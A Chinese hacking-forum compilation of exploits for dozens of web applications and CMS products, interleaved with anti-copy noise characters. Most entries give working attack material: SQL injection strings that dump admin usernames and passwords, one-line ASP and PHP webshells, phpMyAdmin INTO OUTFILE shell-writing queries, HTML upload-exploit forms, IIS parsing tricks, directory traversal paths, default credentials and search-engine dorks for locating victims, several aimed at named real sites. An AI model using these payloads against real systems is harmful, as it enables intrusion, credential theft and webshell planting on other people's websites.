启航企业建站系统 cookie注入漏洞通杀所有版本, `4 ]7 F4 v7 j
) P4 Y _' C" \) m u
直接上exploit:& Q' n, K+ A- I9 H
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));+ ^7 x' c! [) h. ?. _' d* t
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
6 H/ ]' N; C5 K9 W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- t; p$ |8 Z4 `" wAsprain论坛 注册用户 上传图片就可拿到webshell
0 n1 G }" S% K
) l E$ p8 G' R/ t! R: nAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。7 z( J+ F. g: Z& V- a. E4 @+ G
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>! _1 u* }1 V3 r( Y& Z
2.gif 为一小图片文件,一定要小,比如qq表情图片
0 q! ]; Y+ O) J# c3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用) v- I* m' a) e( k
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了$ E) y; B5 ~. K8 D& m
5.q.asp;.gif$ V% \$ n5 O a) P r
google:Powered by Asprain5 M0 |; p4 e7 Z& Z" K+ X8 Y- h5 k0 ?( ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 J; }9 J& Q! b* t5 L" ?4 l2 R! f" Z
) C+ [, k' X/ l* I. h3 w
ShopNum1全部系统存在上传漏洞。; ]* a9 O0 h1 g5 q7 D3 _
; S# j- G; Y: X, V首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
7 C B- y/ V! e4 J按说明 提示登录后台。。
$ W: z% k o" e; e8 y- y- l3 l在后台功能页面->附件管理->附件列表
$ ]3 @) v2 ^$ D8 C& p; q可以直接上传.aspx 后缀木马6 a- x' j& b: K6 d' F
http://demo.shopnum1.com/upload/20110720083822500.aspx
! _, x6 l" l4 u8 W/ Q, G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" w3 \2 Y1 {4 n4 N8 i2 J' k' w9 O
. n: m$ z; n9 z6 N7 @7 p6 B牛牛CMS中小企业网站管理系统 上传漏洞! d- _* n6 T) n5 x; a9 V
' Z4 ^& C+ S' f5 Z* K( _牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
9 N/ L+ E/ z- Y后台:admin/login.asp
+ C+ G( k7 p* I2 D+ ~ewebeditor 5.5 Nday
$ v: d& w6 X' X5 I, I0 U1 gexp:
+ A+ |8 T5 c# S% q; K T" W8 @" c<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
9 I+ f! J# S/ j8 B<input?type=file?name=uploadfile?size=100><br><br>?
4 h" K2 T( R8 h4 o' z6 z<input?type=submit?value=upload>?& z7 r$ s, Q4 l2 H" I( g
</form>+ j( H" J2 {7 J2 B' w6 C o
ps:先上传小马.2 i7 ]% p- T# R. Q
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
% z, ?- e: v+ j% I! t9 [# H: g; b$ Q. c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* b0 K" k. g% c: }& {1 T$ a
0 Z9 |8 N" j) c! q8 jYothCMS 遍历目录漏洞' R$ T' O: [" B, V
$ N* W" D# q- Q4 W1 v& s6 i6 D! K
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
" i ` v0 d' G6 `% P* ~默认后台:admin/login.asp
8 M7 B7 W7 @7 K: s( Y- d: W遍历目录:0 |' K$ n. }7 ~8 ^
ewebeditor/manage/upload.asp?id=1&dir=../
1 G* l9 c) O6 I0 g; J# J7 K5 Ddata:
0 h* a8 p! O. A8 E' L; S/ E2 ihttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
" m& G( e% e( M$ f# j+ _* ]--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" [5 ~( \6 e' y/ k
5 r0 a. G$ U' d9 N. g
Net112企业建站系统 1.0
+ x C1 e; @* H. }2 k
- |& } p; m# m! D2 |' `* M& p1 m源码简介:6 _6 j8 A8 j: p/ k
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。( e8 g. E# S' s& v3 E7 b
添加管理员:- e+ x, g9 h/ y Z! M
http://www.0855.tv/admin/admin.asp?action=add&level=2
5 n) e1 a4 V) P# h7 ~1 W& w其实加不加都不是很重要,后台文件都没怎么作验证。, ]# o$ `: t6 V
上传路径:. U& R5 z' V% v. \
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2003 L U" ?& H0 X$ s
http://www.0855.tv/inc/Upfile.asp?Stype=2
: Y1 b# G0 [, U$ D' h q6 `怎么利用自己研究。* B a4 j+ L& S6 X5 `8 M
遍历目录:
+ b8 h3 W% t/ ghttp://www.0855.tv/admin/upfile.asp?path=../../ `/ L; @; d, g* D
如:: e0 N, v# b0 |0 s0 ?7 L! Z
http://www.0855.tv/admin/upfile.asp?path=../admin
: F* p( i0 W9 yhttp://www.0855.tv/admin/upfile.asp?path=../data
: |) Z; k9 r i. }--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ X$ k1 h4 Z0 y* @/ L
# R6 E& l E. C8 y( P易和阳光购物商城通杀 上传漏洞
2 j0 ~. M5 O9 q- i' p. x k- T( n) ` ` P4 k* C$ F* s. U) S8 ]7 N
前提要求是IIS6.0+asp坏境。
& b8 R0 n& ] G; o) Y! Q* F漏洞文件Iheeo_upfile.asp 5 P/ h0 p! _# m
过滤不严.直接可以iis6.0上传: A' N8 ?2 ], B& q& b6 o9 Q A
把ASP木马改成0855.asp;1.gif
% b( Z: [: i" _, y, \7 }3 Z) D直接放到明小子上传 P1 w4 |- s/ X
Google搜索:inurl:product.asp?Iheeoid=
* D8 ]2 e6 H& Y* S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! r& I( ^0 \9 U6 o0 W; O
9 Q+ c6 C6 M4 {1 [) Aphpmyadmin后台4种拿shell方法0 K: d6 A6 \+ f$ ?% ?6 _
9 U* x/ K# t. I! z6 G% h) i1 u k
方法一:8 s1 ~9 s9 s; k
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );# |( N- c Y4 ?" W5 P/ @
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');" ?$ y. x% \5 @ H8 P4 g
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';; H1 c* y" O0 l) M8 }) C
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
' W7 H2 k. M& }, o一句话连接密码:xiaoma1 T5 {# O3 K: q+ x
方法二:6 Y v" q; m* S# n* X1 g/ G
Create TABLE xiaoma (xiaoma1 text NOT NULL);% X* g! V! V I# B! {
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>'); L. \* W! @- V/ m
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';* ]$ a) u: P& c8 u* y, H# _8 e
Drop TABLE IF EXISTS xiaoma;
; e! f; A; b& ~" }# ] [$ }方法三:! Z" O/ Y9 z8 B& a+ L8 T& }
读取文件内容: select load_file('E:/xamp/www/s.php');( u: Q/ ~4 @+ c2 [/ H: r
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 e6 q5 J5 h1 d7 P4 o" Qcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 A6 W! i; F) }( ]& a9 q6 A7 o方法四:
- R! v1 [8 L; }2 X% g/ Gselect load_file('E:/xamp/www/xiaoma.php');0 S* e4 y, h5 w) |
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 d+ O$ C4 g0 j# s然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
; ~" ^* M8 G1 f5 C5 |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 {( W$ U* X0 m2 n- U: C# M
6 Q5 P6 e( C' Q+ }, ]8 ?" |传信网络独立开发网站源码0day漏洞
' B3 U1 T$ @; c1 }- k! O
3 y1 t9 U. g4 }后台system/login.asp- ]; t6 @2 B! _" @0 X
进了后台有个ewebeditor
( @) l% @2 p2 G% E) WGoogle 搜索inurl:product1.asp?tyc=
5 b& H$ O' n& z3 V编辑器漏洞默认后台ubbcode/admin_login.asp
& i* }- d/ T( x" S8 c数据库ubbcode/db/ewebeditor.mdb l5 l p8 `2 y; E7 N) u
默认账号密码yzm 111111
' F0 G' ~" y) p: A4 U
: ^1 S: V- p {6 y6 b* y& b+ Y5 Q3 T拿webshell方法( m! E/ ~' ` n! I( L3 |
登陆后台点击“样式管理”-选择新增样式
$ m, D" W3 U4 F样式名称:scriptkiddies 随便写
% E& D7 V# d% F; g路径模式:选择绝对路径
% [) o9 H- `8 _9 {: n. u5 ?& e- d图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
9 Y& W/ H/ o, m图片类型比如就是我们要上传的ASP木马格式
0 d' k' g0 ]- _- b) I* D7 A上传路径:/3 E m) u& X( }" b* c
图片限制:写上1000 免的上不了我们的asp木马
, O( [1 Q& e0 z# |. ?9 @上传内容不要写
) m9 U& A! \, j4 Z- G可以提交了 ) N* f& z2 k1 c- h k1 j8 u
样式增加成功! 8 c1 r+ ?1 m, Z h, j! M- |
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
1 [, V! O `/ I按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置9 F- c5 \5 H2 @$ M U9 S2 a
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
# Q1 }4 w. d( j) v' X上ASP木马 回车 等到路径
$ J5 J4 I% w% j% r& g9 G" D1 `0 n. `; j% F2 e9 c
后台:system/login.asp: B5 M1 P C D" U
Exp:, s3 G& p8 G0 ?/ a
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master4 v) {/ t' `( [0 y8 e0 u
测试:
" t! l: z& Z, M7 Bhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master/ L" n0 w4 I; _% A) f; L+ i5 n
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master7 D; H) _$ k1 L. ^. Q% y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 | ^: D1 k# h6 x3 l. I2 w
; ^0 \; c, u( C' s
foosun 0day 最新注入漏洞. ?7 _( u% q6 X. w7 F
( X" y1 Z2 } q7 M% U
漏洞文件:www.xxx.com/user/SetNextOptions.asp
, X( w. o, j$ {# r利用简单的方法:7 y N! c& C/ y2 i* k
暴管理员帐号:/ K+ N+ f. {$ t0 R m
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin( t, n3 E$ P2 Z# i1 k7 h
暴管理员密码:1 w. c; s0 ]0 \
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
3 z1 G& v+ t: f& N--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
\* h" x1 X1 A9 ?( N; _
7 Z, ?- n# [# L* g网站程序的版权未知!
# W# N8 ^+ d+ K9 |& P: `8 k* v6 B( K+ v$ v
默认网站数据库:5 K: c. m& T6 |/ e; a: b; ? z
www.i0day.com/data/nxnews.mdb7 U/ k0 a$ v; k! g/ U
ewebeditor 在线编辑器:
! C: f0 d6 `% I; v; ?编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
+ }& M3 E `- t) ?- Z q登录地址:ewebeditor/admin_login.asp
( ?* r1 G8 o$ [! L( s9 r, r默认密码:admin admin
1 d0 C1 \/ O( @登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
; o8 `9 y* E. l! I6 |8 b; E9 k+ C3 t9 p
Sql注入漏洞:5 E# O+ l. R# `
http://www.i0day.com/detail.asp?id=12
# T& ^% n" p2 ~exp:
& C# a( C7 F, O9 qunion select 1,admin,password,4,5,6,7,8 from admin
7 q0 K( j) v# w8 J4 F2 V/ ~/ N爆出明文帐号/密码% S$ f" K4 K. {$ `& G+ z/ j. m
& z3 C5 E- `; `. z
上传漏洞:' k! D7 f( j7 Q5 W1 t/ o
后台+upfile.asp
: k# Q4 A4 E- J8 e如:
2 F- r5 t2 o. m# Ghttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。% Z+ E e( w `' G# o. _9 L
shell的地址:网址+后台+成功上传的马3 m, h! P. o: B1 c" c' [* c$ T6 {
google:inurl:news.asp?lanmuName=
& h0 t5 k$ `2 Q/ X8 m2 q------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 a6 [; R0 l% L& Z) ]- i
: ?$ e! }$ n8 @8 k
dedecms最新0day利用不进后台直接拿WEBSHELL
- Z5 P" O8 ~2 W8 R' ]& k: S( w) Z2 H4 |6 z& W' g( y9 @6 o% p
拿webshell的方法如下:
) Y* ^" Q1 Z2 Y网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
2 z3 h0 c1 \) ], ~前题条件,必须准备好自己的dede数据库,然后插入数据:) B& E) @+ ?+ T3 J) G$ @' r
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ; T4 N% N# w. C$ @
# v( k9 e5 D1 U. Q6 Q; m再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。) ]7 ]- k, T! r9 D1 P5 i
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
# X- x# _* {6 `( k<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />7 \" i& _- c8 I3 t
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />) U1 \7 {1 P% F4 P1 K2 s9 p3 K
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
/ Q7 Z$ o1 [$ P7 S<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
7 R" l9 d$ ]" x3 x: H7 m<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />+ R+ D3 p2 R& h* E5 q) X( B& S
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />7 x0 i/ ^3 H9 j
<input type="text" value="true" name="nocache" style="width:400">
; k' C6 a' I) f+ q<input type="submit" value="提交" name="QuickSearchBtn"><br />
% f; v0 A- g% D</form>
+ {+ n! L( ^$ T# E<script>
( e @( U* a' x7 O2 n6 w% c% Z) B* Tfunction addaction()# k* r4 U* O+ W
{
# Q* ^: ]: s3 V5 Udocument.QuickSearch.action=document.QuickSearch.doaction.value;
3 u( p& s4 |1 ]% @# s" V}" I* G& Z5 Q2 R& O' u; s
</script>* u4 G2 s$ S. Q
-----------------------------------------------------------------------------------------------------------------------------------------------
: V8 w# {" k% D8 n, k9 Z1 y( j
2 m9 z k; s5 E+ w3 ^, ddedecms织梦暴最新严重0day漏洞+ q" w) S' e# J5 ]
bug被利用步骤如下:
) M8 v. A. x0 z7 j- Z5 X ghttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
( T! d7 T1 V$ L$ U把上面{}上的字母改为当前的验证码,即可直接进入网站后台。& p3 X" n& m. G; j3 w8 O# X* `* p* N
------------------------------------------------------------------------------------------------------------------------------------------- q4 |8 G0 t! n6 L, w
1 J" e3 X9 |' ]( i" c* f' G
多多淘宝客程序上传漏洞 ( K1 W( ?# r* z
漏洞页面:
; B! I. G6 N6 B8 g; X6 badmin\upload_pic.php
9 n3 b$ N4 L+ F0 j6 {传送门:
) ?4 B2 P0 r* ^1 Q1 }+ Bhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1, @, j6 a ^$ S+ F
PS:copy张图片马 直接 xxx.php 上传抓包地址!& w; E8 D( Z# }1 p
------------------------------------------------------------------------------------------------------------------------------------------------------: s0 w9 H; y0 n8 k; L
) T( X, O% E7 |7 k
无忧公司系统ASP专业版后台上传漏洞
# q e( _- W1 v漏洞文件 后台上传
1 `3 L4 p* m: P1 z. {2 n- O" yadmin/uploadPic.asp
# j$ S% z$ {/ Y! v& B* F漏洞利用 这个漏洞好像是雷池的
$ {/ l6 C$ ?, }3 l$ p* \. \* Ehttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
( v( [' ^) d Y# T4 \8 E0 m等到的webshell路径:% k( g+ P2 k/ ?) i9 f% ]
/UploadFiles/scriptkiddies.asp;_2.gif
5 X( c7 n# S+ w2 k: N6 z A---------------------------------------------------------------------------------------------------------------------------------------------------: C0 g$ @& w3 w6 }
8 O) F% b7 }. G4 E, W% V
住哪酒店分销联盟系统2010
# W5 l" q' O, q( N3 H7 SSearch:
. ^" g) J2 B) L2 G, rinurl:index.php?m=hotelinfo
6 t/ y# Y) v5 Q9 a0 \: `8 G# M2 ]( R" }- Whttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
W' A/ c! u1 z默认后台:index.php?m=admin/login8 H' Y0 S. _* h5 Z9 w7 p5 L
--------------------------------------------------------------------------------------------------------------------------------------------------" l B9 b+ D! y7 s1 A; V% O' B( F/ g/ f1 O
% B- ]0 j# [: s( ?- Zinurl:info_Print.asp?ArticleID=# r. N1 \9 }' `/ g# y: N0 B, R" S3 b% [
后台 ad_login.asp$ G7 @8 z# t( K* X* _# z
爆管理员密码:2 U4 {6 U% _, J
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
9 A8 M8 w' Z5 E) P" F" O* Y) m------------------------------------------------------------------------------------------------------------------------------------------------------------* g4 X2 R2 N9 h B# j) `7 @
5 m/ \# J( ^, j& b: ?( R5 o搜索框漏洞!
* V- j: D2 S# e' F%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='8 |, u" w( {2 C; a5 k
--------------------------------------------------------------------------------------------------------------------------------------------------------( J& G2 _% ^- u5 l2 O
7 v, H! z5 |5 W$ ^" z& ^2 d4 B关键字:
: V+ w3 T9 [3 ?4 p! N2 Einurl:/reg_TemletSel.asp?step=2, v- o6 Y2 u u$ V7 N
或者
- K3 [& Z+ A9 q电子商务自助建站--您理想的助手
# d9 Z5 n3 b; y; z d$ h! e-------------------------------------------------------------------------------------------------------------------------------------------------
' e$ _0 s( T9 _' w1 q; A5 F3 _5 R1 r, o1 |
iGiveTest 2.1.0注入漏洞
$ O4 ]2 c* ^% [. |Version: <= 2.1.0% i: z) o/ Z* A! l1 ?$ X# g
# Homepage: http://iGiveTest.com/
1 E( e* o" g; }. G/ x谷歌关键字: “Powered by iGiveTest”
: Z- o/ N5 I# ?2 r% U: i6 p% M' [( o随便注册一个帐号。然后暴管理员帐号和密码5 o# C3 N3 S6 Y+ ~$ I- n# g
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
9 q2 |/ f3 Y: q+ ^9 r1 n: x------------------------------------------------------------------------------------------------------------------------------------------------' L9 L- {0 R: R. } D
# m) z: O2 s# W$ b/ R) D: O
CKXP网上书店注入漏洞
/ ^5 `" E4 C3 b6 c工具加表:shop_admin 加字段:admin
. y! c7 [' p8 s( s" ^- i后台:admin/login.asp " Y9 j) @8 m3 i/ V
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/7 l0 f, @( Q* O0 a, b) g+ m4 c) g
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息 [0 F+ b; v. y4 z) s$ q7 ]; e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 M) `& G2 u7 l( a0 A+ K* g1 n# I
段富超个人网站系统留言本写马漏洞
3 m. o' M2 H1 n4 F" w8 c源码下载:http://www.mycodes.net/24/2149.htm" M3 L1 H5 l% q: b2 `8 M
addgbook.asp 提交一句话。 K4 I# Y+ H$ R7 r% r- {4 p. w7 T
连接: http://www.xxxx.tv/date/date3f.asp
" ]% |* C s2 B% {9 u4 pgoogle:为防批量,特略!
4 b. k3 ~ }; S6 w-------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 ~2 |6 e u# k1 `, K$ H% O
& Y$ P& f. S( t% Q5 x
智有道专业旅游系统v1.0 注入及列目录漏洞
( X1 v2 E( | \7 L6 E/ a6 a默认后台路径:/admin/login.asp
7 ?4 r: Q1 `6 ?6 @默认管理员:admin, @- z& S1 q# o+ H9 \
默认密码:123456! V5 E K9 i' c
SQL EXP Tset:
5 k& k5 M4 m. r6 jhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin% y, Q/ h. q* {# ~ g# D
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 V1 X }2 ]) o0 g' h" a* [) O( A0 v$ W% ?9 ]8 s! u6 G, ~1 T }
ewebeditor(PHP) Ver 3.8 本任意文件上传0day- f7 `) z' W9 b( X" m: G8 A! q1 T8 B0 k
EXP:0 u2 I" r }8 Z
<title>eWebeditoR3.8 for php任意文件上EXP</title>
`" Y* v# q" u<form action="" method=post enctype="multip
3 w( m; i9 H W3 @" }art/form-data"> 1 v7 Y; N5 ?8 ]5 }; c
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
7 e1 f2 L) d u5 r6 X) w/ _5 {. H5 D/ A$ rURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
7 k: Q7 w" ]+ |. R0 S<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ' i! k3 {: ~0 P9 S& P
file:<input type=file name="uploadfile"><br> $ C- H" j4 m6 V/ o( b. q7 z
<input type=button value=submit onclick=fsubmit()> " {2 A3 j3 \3 t z* H4 p' Y
</form><br>
7 B4 z6 ~* l" c0 q<script>
! v* j5 ~! ?, D& f8 h8 i: N( R! |( ~1 nfunction fsubmit(){
" k5 k. ]; ?, _; c2 S! O5 ]form = document.forms[0];
# M9 {7 \6 @, T9 V) {7 Uform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; " j% [3 l5 m7 V; {0 [: e
alert(form.action); 2 n/ Y) f& P: T
form.submit(); * e" j9 o# O% O$ E! S% j
} 4 p7 a' V1 e' { X9 B$ ]+ g* t
</script># O4 |" ^2 V- q4 R
注意修改里面ewebeditor的名称还有路径。) ]% {/ U# \ H- ~3 {9 y
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 U9 y! p& C2 A: l" l3 R2 p! u
( N% ]6 N1 N: t; ^9 g. X提交’时提示ip被记录 防注入系统的利用3 b1 h5 g, M' y0 S# u. h0 g
网址:http://www.xxx.com/newslist.asp?id=122′
# j1 V) y$ q( D& [, Y. Y* K提示“你的操作已被记录!”等信息。
3 l# w5 d& |3 i0 w0 E7 w& D利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
s9 B3 @% O/ X, ^-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------& O9 |( ~7 b, I0 G
8 A' T0 c# P0 |+ x西部商务网站管理系统 批量拿shell-0day
% f2 A. {" c* D8 ]& }! o这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 3 I) P( ~+ A: o+ C3 o2 m, [
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
$ q6 g) D1 N2 Y- v* N2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
2 B8 n% p3 {; Q# {0 N; }. H7 E3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂! y' [, w6 I S# V% `' f! j0 r, e/ e# q
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 L. `/ ]: G0 R4 ^3 ^8 P
- S: ~9 ?0 w" I9 H3 X3 P' `' aJspRun!6.0 论坛管理后台注入漏洞) h0 C2 [. F) p \, ^9 \# s
$ N6 U9 ]: I/ i3 G( j: rSEBUG-ID:20787 发布时间:2011-04-30 影响版本:& f& i* C. ?# S) a: V: z
JspRun!6.0
% G* S# \6 h% Q) a, g- x& \漏洞描述:
3 m. e, i! z2 ~JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
! U; D+ Y# V6 @3 h7 z+ s: t在处理后台提交的文件中ForumManageAction.java第1940行
7 F( h& ~1 B' h2 ~String export = request.getParameter("export");//直接获取,没有安全过滤
% P& A& Q' Q+ C3 q0 }# Yif(export!=null){$ r6 C; b# C* j
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
* y! t% M' J9 l6 F' wif(styles==null||styles.size()==0){5 z7 Z4 l7 m) a0 x0 a
<*参考% n5 a( |6 ~* g# g" r% y
nuanfan@gmail.com
" u0 I2 M- L9 P& a. \- \$ z*> SEBUG安全建议:# H0 {8 |; l" a; {0 W% g" _
www.jsprun.net
- ]+ G( M* J& _' Y(1)安全过滤变量export- P& R1 K+ i6 }6 K8 ~
(2)在查询语句中使用占位符. |3 V% ^3 O' [9 x% y1 ]: i5 y
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 \2 z4 J/ d) S) {
$ M' @% q$ ?1 g5 k乌邦图企业网站系统 cookies 注入
3 X" I" i- x* ? i, N. [" x2 l2 \# P! ?* r" A; {
程序完整登陆后台:/admin/login.asp) n, b, C2 Y; l( W; [
默认登陆帐号:admin 密码:admin8882 b) e; L9 |# k4 W: w7 w" t
语句:(前面加个空格)$ y: Y- M/ C$ a; o; X- S% J3 k
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin5 y- O8 g5 P! h$ P, A5 X8 i$ J
或者是16个字段:. L" j9 _6 a8 G2 [! n! ~) d, B* U
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin7 F" v5 z; ^# n7 s$ n; h
爆不出来自己猜字段。
6 J1 S' J z+ w3 g4 j注入点:http://www.untnt.com/shownews.asp?=88
- s8 I/ d. W: L3 L0 y& U5 ^% ogetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
' h2 x8 G! ~/ T5 F0 O! T关键字:4 C' L+ W- N/ b8 ^8 L
inurl:shownews?asp.id=
! O- {) J4 h; T3 B-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ p/ Z4 [3 |- g9 a: Y& d9 W
2 Z/ f& T7 v: U3 |3 B4 aCKXP网上书店注入漏洞
2 b$ N, a' ^1 E% V2 c9 y5 B) v! W; J8 ^# w& z( D, W
工具加表:shop_admin 加字段:admin
% [0 Z4 \- l' P }后台:admin/login.asp
2 m: p8 l- F5 F1 X4 c登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/. i( v. ^, Y) q3 F& T' K
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
1 ? m3 W1 U3 h---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
L( H0 x$ [5 t/ S( R5 N/ E
( t& k) q1 X7 R) T' N& KYxShop易想购物商城4.7.1版本任意文件上传漏洞
9 M7 @% R; j7 O# y ^ p1 j/ ^* R. Q) [! o/ g" I
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
# E% \! |2 p+ ?" S7 Z8 ~* `跳转到网站根目录上传任意文件。
7 p+ a/ \ A5 j如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件4 R# h0 n' h' u6 @. U7 J1 V
